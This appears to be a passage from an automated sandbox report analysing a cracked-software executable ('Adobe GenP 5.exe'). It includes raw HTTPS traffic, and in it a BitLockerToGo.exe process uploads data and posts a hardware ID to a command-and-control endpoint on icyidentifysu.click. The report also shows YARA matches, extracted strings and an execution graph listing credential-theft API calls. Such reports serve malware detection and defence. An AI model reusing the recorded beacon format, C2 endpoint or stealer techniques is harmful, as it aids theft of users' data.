                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 43 c0 f4 9a ab 20 d4 c4 2a ac df fd 6e e1 4e 42 cb ba 8f 27 bb 6a ae 1f 07 df 32 f4 17 08 84 c0 ca f6 6a 15 e6 57 d9 2d bc df b1 ca f2 c1 ec e2 45 ca e2 b2 7a 20 f3 66 05 42 c8 8b c8 17 25 14 9c ea f4 2d 13 fc 08 d8 c9 d7 a7 f5 e4 97 9e 5a 50 8d 20 d2 b9 56 3b 24 3e 3d 64 41 bd 0d 07 bd 04 0c 0c 66 d6 3b 9a 59 8e 07 79 bb a4 c0 5e e6 d1 86 7a 77 40 d9 87 cf 88 8d 1e 10 01 85 d9 ab fe ad 47 cc 18 af 04 c0 9e 16 58 1d 9f 79 0c 38 89 63 03 9f 8a 75 cd f0 80 03 3c ae 58 e0 72 18 b6 07 76 a3 23 70 29 e6 a5 18 fe cc 3b da b7 51 1f b7 e8 57 5d 04 70 89 9d ae cc 7e 78 6d b0 c9 8c 80 b2 ff 4c e1 83 c6 8f 91 d1 1c ff fd 78 15 86 4a ab 89 5c fb 4f cc 0e c6 ad 0b 4a 58 80 49 93 6d 34 22 1b ac 3a 61 4e 01 b2 39 39 21 c9 53 82 72 12 a0 88 19 f2 d5 07 cc c9 97 c8 4c 65
                                                                                  Data Ascii: C *nNB'j2jW-Ez fB%-ZP V;$>=dAf;Yy^zw@GXy8cu<Xrv#p);QW]p~xmLxJ\OJXIm4":aN99!SrLe
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 62 ec 47 e3 f5 95 07 e5 e7 8e ea 99 a3 3f ea 1c 96 92 f2 de 89 c2 bb 7b 13 0e 6b b8 fd 1d 57 73 36 8f 5a 8c c1 68 46 6b 37 32 a6 f0 0e 20 ec 0f a4 58 fb 01 7a 30 ee 7f 95 76 92 d4 89 22 cf 20 65 15 46 e7 1b e9 2b 01 ad 90 ac 9b 84 1e 5b 67 79 4b 1c 69 88 a6 67 db b4 8d 02 68 8c 18 dd 3a a7 35 3c 5a ef dc c4 48 a7 a4 62 87 6c 74 f2 16 92 c6 c5 6f f1 49 22 76 21 a5 ec 9c 06 a9 1d 42 f3 e2 02 be 16 57 43 af c4 50 2d aa f4 36 d4 93 46 39 f2 fd 2d 1f f1 41 98 67 be 4f 9f 26 81 ba f7 80 56 fb 46 e5 cc 0f 92 dd 11 d3 a9 cd af c1 43 15 3f 48 3a 22 ae 57 20 85 3b 16 75 a3 79 f3 7c d6 b1 26 33 a0 6b e6 cb 20 03 05 ae b4 28 0e d0 5e f3 bc 4f 9f a3 b9 80 18 7f 5e ef 5f e9 c0 6e 92 fd 53 8d 5c 8d f0 be 6b 06 63 75 9d 84 42 5b 72 1b 17 2d c7 bf b2 49 60 3d 92 b8 de 7b
                                                                                  Data Ascii: bG?{kWs6ZhFk72 Xz0v" eF+[gyKigh:5<ZHbltoI"v!BWCP-6F9-AgO&VFC?H:"W ;uy|&3k (^O^_nS\kcuB[r-I`={
                                                                                  2024-12-24 01:56:48 UTC15331OUTData Raw: 5e e6 5e 04 64 01 68 bc af ce b0 43 d2 3f de d5 7f d7 43 57 f4 bf f0 13 db f3 f6 15 a2 7e 93 e2 4e 1f 73 90 75 5e 68 0b fb 45 54 85 db 8b 50 9e 24 6f 33 70 82 ac 00 19 b6 6e b4 16 e5 ef dd 0b 5b 54 ad f5 ac cb 5b 3f 98 79 1b c6 7b c6 58 49 ec 59 4f d1 c8 a1 99 2e 29 5f 40 39 9b 07 ca 20 7e 9e 92 1d a2 09 03 f7 9d f9 44 14 5c 51 8c e9 7b 60 97 28 de ff ef 2b d4 55 a9 9e 5a da 87 40 e1 b9 e3 36 74 5a 07 49 05 05 b2 54 2f 50 61 38 1c b5 03 2c a0 d6 76 b1 72 69 54 14 8c 8a 47 d1 f0 30 61 10 ae c0 d8 9b 09 62 df 51 01 b1 c5 1d 00 d8 73 39 88 7f 1b 26 18 43 ea 5b 6d df 47 4e 3a e0 de 5e ab d2 df 1d af 9e 23 dc 72 00 8f 3d 47 71 80 28 5e 3f eb b3 ff 16 7c 20 3c 34 b0 83 05 8c 72 c7 b8 e3 84 cf 61 8b 8a 3a 7e ce d7 d5 82 62 d2 ee 68 68 4d 61 f5 ad 11 c2 03 81 60
                                                                                  Data Ascii: ^^dhC?CW~Nsu^hETP$o3pn[T[?y{XIYO.)_@9 ~D\Q{`(+UZ@6tZIT/Pa8,vriTG0abQs9&C[mGN:^#r=Gq(^?| <4ra:~bhhMa`
                                                                                  2024-12-24 01:56:51 UTC1131INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:56:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=pon65kmk2kqaasivo2emp2rofe; expires=Fri, 18 Apr 2025 19:43:29 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quSxwXMJEkgl98HBw0KZ6qwuAfwB2iSefp2yY9njwBvKAUToA7jD2QPrUM0t6UbFefwK%2B71LVISDPQa1cj3fX3Nlj4qDO09wPrBI9OEi%2B6caiUcVMvU81hMbieHQYNa7huHcXbqL"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cfa1e7e9c6a57-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1568&rtt_var=607&sent=209&recv=618&lost=0&retrans=0&sent_bytes=2851&recv_bytes=595170&delivery_rate=1775075&cwnd=231&unsent_bytes=0&cid=eea19afd1e7a3db4&ts=2418&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.549781104.21.29.2524435448C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-24 01:56:52 UTC267OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 89
                                                                                  Host: icyidentifysu.click
                                                                                  2024-12-24 01:56:52 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 79 63 70 6a 6e 61 66 73 63 66 7a 26 6a 3d 26 68 77 69 64 3d 38 37 43 37 31 46 35 34 38 30 32 38 31 38 43 42 30 38 35 39 32 35 37 46 38 43 39 36 35 37 31 37
                                                                                  Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--iycpjnafscfz&j=&hwid=87C71F54802818CB0859257F8C965717
                                                                                  2024-12-24 01:57:00 UTC1130INHTTP/1.1 200 OK
                                                                                  Date: Tue, 24 Dec 2024 01:57:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=rg2m46nflalqoh71o9haltjpvc; expires=Fri, 18 Apr 2025 19:43:39 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZtOwQbEDYPGwW4ug%2FidasgyF2APdHtRG%2FDIWCI9lzlGy53ZNiCY1VEMdfpDO4I7%2FzGpaBr0Og7X%2B23tT2vWgqsvRvewHn6QBZuRM%2BBqyRSsEhcls4b8Dpm5aAmKAUQhqL8AxDFXF"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8f6cfa3618331a38-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1868&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=992&delivery_rate=1563169&cwnd=220&unsent_bytes=0&cid=bd5acf732423012a&ts=7940&x=0"
                                                                                  2024-12-24 01:57:00 UTC54INData Raw: 33 30 0d 0a 34 53 31 56 6f 7a 6b 45 54 6c 65 6b 31 32 50 43 63 4d 2b 49 50 4a 39 73 57 57 36 67 45 59 33 49 55 41 53 5a 50 2b 51 67 6b 61 4b 36 63 41 3d 3d 0d 0a
                                                                                  Data Ascii: 304S1VozkETlek12PCcM+IPJ9sWW6gEY3IUASZP+QgkaK6cA==
                                                                                  2024-12-24 01:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:20:56:01
                                                                                  Start date:23/12/2024
                                                                                  Path:C:\Users\user\Desktop\Adobe GenP 5.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\Adobe GenP 5.exe"
                                                                                  Imagebase:0xc20000
                                                                                  File size:14'820'352 bytes
                                                                                  MD5 hash:9CCE9D11869E1568A959515CD688F1F9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:20:56:26
                                                                                  Start date:23/12/2024
                                                                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                  Imagebase:0xee0000
                                                                                  File size:231'736 bytes
                                                                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Reset < >
                                                                                    Strings
                                                                                    • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowthird_party/swagger-ui/swagger-ui.csst, xrefs: 00C53C1B
                                                                                    • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filesunclosed left parenunexpected %s in %sunexpected InstFailunexpected g statusunknown Go ty, xrefs: 00C53A9B
                                                                                    • %, xrefs: 00C53C24
                                                                                    • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00C53B8C
                                                                                    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00C53B31
                                                                                    • bad g0 stackbad recoveryblock clausecaller errorcan't happencas64 failedcgo functionchan receiveclose notifycontent-typecontext.TODOdarwin/amd64darwin/arm64dumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco, xrefs: 00C53B0A
                                                                                    • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not, xrefs: 00C53BE7
                                                                                    • CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecan't install method/function %q with %d resultscannot use FakeImportC and go115UsesCgo togethercould not find GetSystemTimeAsFileTime() syscallfail to read symbol , xrefs: 00C53BC0
                                                                                    • VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer, xrefs: 00C53B65
                                                                                    • )*.*/*=+++-+=, ---=->.(.\/*///=/i/v00010X0b0o0s0x1;254;535;7;809;: :=:]; <-<<<==#==> >=>>??A3A4CNCcCfCoCsLlLmLoLtLuMcMeMnMuNONdNlNoNuONOUOnPcPdPePfPiPoPsR8R9STScSkSmSoTeV1V2V3V5V6XiYiZlZpZs[]")":"\$\'\(\)\*\-\.\/\0\9\?\D\E\S\W\[\"\\\]\^\a\c\d\f\n\r\s\t\w\{\|, xrefs: 00C53AEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2307376286.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2307360248.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000EC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307973819.000000000117F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307995567.0000000001180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308016419.000000000118A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308681416.00000000019DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308698146.00000000019DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308711580.00000000019DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308724757.00000000019DE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.0000000001A09000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308795286.0000000001A10000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A11000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c20000_Adobe GenP 5.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowthird_party/swagger-ui/swagger-ui.csst$%$)*.*/*=+++-+=, ---=->.(.\/*///=/i/v00010X0b0o0s0x1;254;535;7;809;: :=:]; <-<<<==#==> >=>>??A3A4CNCcCfCoCsLlLmLoLtLuMcMeMnMuNONdNlNoNuONOUOnPcPdPePfPiPoPsR8R9STScSkSmSoTeV1V2V3V5V6XiYiZlZpZs[]")":"\$\'\(\)\*\-\.\/\0\9\?\D\E\S\W\[\"\\\]\^\a\c\d\f\n\r\s\t\w\{\|$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecan't install method/function %q with %d resultscannot use FakeImportC and go115UsesCgo togethercould not find GetSystemTimeAsFileTime() syscallfail to read symbol $VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer$bad g0 stackbad recoveryblock clausecaller errorcan't happencas64 failedcgo functionchan receiveclose notifycontent-typecontext.TODOdarwin/amd64darwin/arm64dumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filesunclosed left parenunexpected %s in %sunexpected InstFailunexpected g statusunknown Go ty
                                                                                    • API String ID: 0-971395273
                                                                                    • Opcode ID: 2b341477204dbdf11ba9091713056b3e2748f9b93d3a7a38fd21549b1787ef53
                                                                                    • Instruction ID: 60b894b5ca1e77409af5ce25c3bbb6bd95200e8145fffb8444eaf0d1a1e26e92
                                                                                    • Opcode Fuzzy Hash: 2b341477204dbdf11ba9091713056b3e2748f9b93d3a7a38fd21549b1787ef53
                                                                                    • Instruction Fuzzy Hash: A681F5B85097458FD300EF64D18571ABBE0BF88749F40892CF89897392DB74D988EF5A
                                                                                    Strings
                                                                                    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablesymbol does not existtimer da, xrefs: 00C63AE1
                                                                                    • m->p= max= min= next= null p->m= prev= span=% util%%%02x%s.v%d%s: %s' for '"&<>, xrefs: 00C63A4B
                                                                                    • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterssyntax errortraceStringstransmitfileunexpected )unknown portuntyped booluntyped runewintrust.dllwirep: p->m=worker mode wtsapi32.dll{{continue}} != sweepgen (defau, xrefs: 00C63A29
                                                                                    • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportCGO_ENA, xrefs: 00C63A97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2307376286.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2307360248.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000EC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000FBF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307973819.000000000117F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2307995567.0000000001180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308016419.000000000118A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308681416.00000000019DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308698146.00000000019DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308711580.00000000019DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308724757.00000000019DE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308737772.0000000001A09000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308795286.0000000001A10000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A11000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c20000_Adobe GenP 5.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: m->p= max= min= next= null p->m= prev= span=% util%%%02x%s.v%d%s: %s' for '"&<>$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportCGO_ENA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablesymbol does not existtimer da$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterssyntax errortraceStringstransmitfileunexpected )unknown portuntyped booluntyped runewintrust.dllwirep: p->m=worker mode wtsapi32.dll{{continue}} != sweepgen (defau
                                                                                    • API String ID: 0-3735137587
                                                                                    • Opcode ID: aa551de960785934747052479f69e278c01850fc5aee374284261b704e339752
                                                                                    • Instruction ID: 2d21afbc85155b9b969dcf00d79bcacef6657d3b7c08de407033cd94c5c9682c
                                                                                    • Opcode Fuzzy Hash: aa551de960785934747052479f69e278c01850fc5aee374284261b704e339752
                                                                                    • Instruction Fuzzy Hash: 813106B85097458FD300EF64C18571ABBE1FF88305F41892DE8989B352DB74D988EF66

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:59.4%
                                                                                    Total number of Nodes:155
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph 13044 420000 13045 420014 13044->13045 13049 420121 13044->13049 13050 420140 13045->13050 13047 4200fc 13048 41e7f0 LdrInitializeThunk 13047->13048 13047->13049 13048->13049 13052 420150 13050->13052 13051 43be10 LdrInitializeThunk 13053 42025f 13051->13053 13052->13051 13052->13052 12969 42a749 12970 42a753 12969->12970 12971 42ba38 GetPhysicallyInstalledSystemMemory 12970->12971 12972 42ba60 12971->12972 13059 408690 13062 40869f 13059->13062 13060 40897b ExitProcess 13061 40895f 13061->13060 13062->13060 13062->13061 13064 40c7c0 CoInitializeEx 13062->13064 13065 416d93 13067 416da0 13065->13067 13066 416f27 CryptUnprotectData 13067->13066 12973 43c050 12974 43c070 12973->12974 12977 43c0c8 12974->12977 12979 439af0 LdrInitializeThunk 12974->12979 12975 43c16e 12977->12975 12980 439af0 LdrInitializeThunk 12977->12980 12979->12977 12980->12975 13068 43c410 13069 43c430 13068->13069 13071 43c47e 13069->13071 13074 439af0 LdrInitializeThunk 13069->13074 13071->13071 13073 43c54f 13071->13073 13075 439af0 LdrInitializeThunk 13071->13075 13074->13071 13075->13073 12989 40e2d5 12990 40e2e1 12989->12990 12991 40e713 CoUninitialize 12990->12991 12992 40e730 12991->12992 13076 433f96 13080 43b5e0 13076->13080 13078 433fae GetUserDefaultUILanguage 13079 433fe0 13078->13079 13081 43b610 13080->13081 13081->13081 12993 43a55a 12994 43a564 12993->12994 12995 43a63e 12994->12995 12999 439af0 LdrInitializeThunk 12994->12999 12998 439af0 LdrInitializeThunk 12995->12998 12998->12995 12999->12995 13000 42b2db 13001 42b2e4 13000->13001 13004 435090 13001->13004 13007 43509e 13004->13007 13005 42b3f7 13008 43514b 13007->13008 13013 439af0 LdrInitializeThunk 13007->13013 13008->13005 13010 435234 13008->13010 13012 439af0 LdrInitializeThunk 13008->13012 13010->13005 13014 439af0 LdrInitializeThunk 13010->13014 13012->13008 13013->13007 13014->13010 13082 40d49a 13083 40d4b0 13082->13083 13085 40d52e 13083->13085 13098 439af0 LdrInitializeThunk 13083->13098 13087 40d5de 13085->13087 13099 439af0 LdrInitializeThunk 13085->13099 13094 423040 13087->13094 13089 40d65a 13090 4253a0 LdrInitializeThunk 13089->13090 13091 40d683 13090->13091 13092 4256a0 LdrInitializeThunk 13091->13092 13093 40d68c 13092->13093 13095 42304e 13094->13095 13100 43c310 13095->13100 13098->13085 13099->13087 13102 43c330 13100->13102 13101 423122 13102->13101 13104 439af0 LdrInitializeThunk 13102->13104 13104->13101 13105 43a01c 13107 43a01e 13105->13107 13106 43a082 13107->13106 13110 439af0 LdrInitializeThunk 13107->13110 13109 43a154 13110->13109 13015 4228e2 13016 4228f1 13015->13016 13019 43be10 13016->13019 13018 4229e1 13020 43be30 13019->13020 13021 43bf3e 13020->13021 13023 439af0 LdrInitializeThunk 13020->13023 13021->13018 13023->13021 13111 40dca0 13112 40dcc0 13111->13112 13117 4353a0 13112->13117 13114 40ddce 13115 4353a0 3 API calls 13114->13115 13116 40dfc5 13115->13116 13116->13116 13118 4353d0 13117->13118 13118->13118 13119 4356c5 SysAllocString 13118->13119 13123 435718 13118->13123 13121 4356ed 13119->13121 13120 435a87 GetVolumeInformationW 13124 435aa2 13120->13124 13122 4356f8 CoSetProxyBlanket 13121->13122 13121->13123 13122->13123 13123->13120 13124->13114 13125 420720 13134 43bc90 13125->13134 13128 420760 13129 420eb0 13128->13129 13133 420810 13128->13133 13138 439af0 LdrInitializeThunk 13128->13138 13131 420e32 13131->13129 13140 439af0 LdrInitializeThunk 13131->13140 13133->13131 13139 439af0 LdrInitializeThunk 13133->13139 13136 43bcb0 13134->13136 13135 43bdbe 13135->13128 13136->13135 13141 439af0 LdrInitializeThunk 13136->13141 13138->13128 13139->13133 13140->13131 13141->13135 13142 40d3a4 13143 40d3c0 13142->13143 13144 40d43c 13143->13144 13146 439af0 LdrInitializeThunk 13143->13146 13146->13144 13024 439be8 13025 439c00 13024->13025 13028 439cde 13025->13028 13031 439af0 LdrInitializeThunk 13025->13031 13027 43a082 13028->13027 13032 439af0 LdrInitializeThunk 13028->13032 13030 43a154 13031->13028 13032->13030 13147 40cf2b 13148 40cfb0 13147->13148 13148->13148 13149 40d02e 13148->13149 13153 439af0 LdrInitializeThunk 13148->13153 13152 439af0 LdrInitializeThunk 13149->13152 13152->13149 13153->13149 13033 4380f3 13036 43b250 13033->13036 13035 4380f8 RtlFreeHeap 13037 43b270 13036->13037 13037->13035 13037->13037 13038 40c7f3 CoInitializeSecurity 13159 4380b0 13160 4380b6 RtlAllocateHeap 13159->13160 13161 439ab6 13162 43b250 13161->13162 13163 439abb RtlReAllocateHeap 13162->13163 13164 439ae0 13163->13164 13165 42dbbf 13168 4145b0 13165->13168 13167 42dbc4 CoSetProxyBlanket 13168->13167 13039 439e7d 13041 439e90 13039->13041 13040 439ede 13041->13040 13043 439af0 LdrInitializeThunk 13041->13043 13043->13040 13169 42a03c 13170 43b5e0 13169->13170 13171 42a04c GetComputerNameExA 13170->13171 13173 42a0a0 13171->13173 13172 42a11b GetComputerNameExA 13174 42a180 13172->13174 13173->13172 13173->13173 13175 41733e 13176 417345 13175->13176 13176->13176 13177 43be10 LdrInitializeThunk 13176->13177 13178 41747d 13177->13178

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
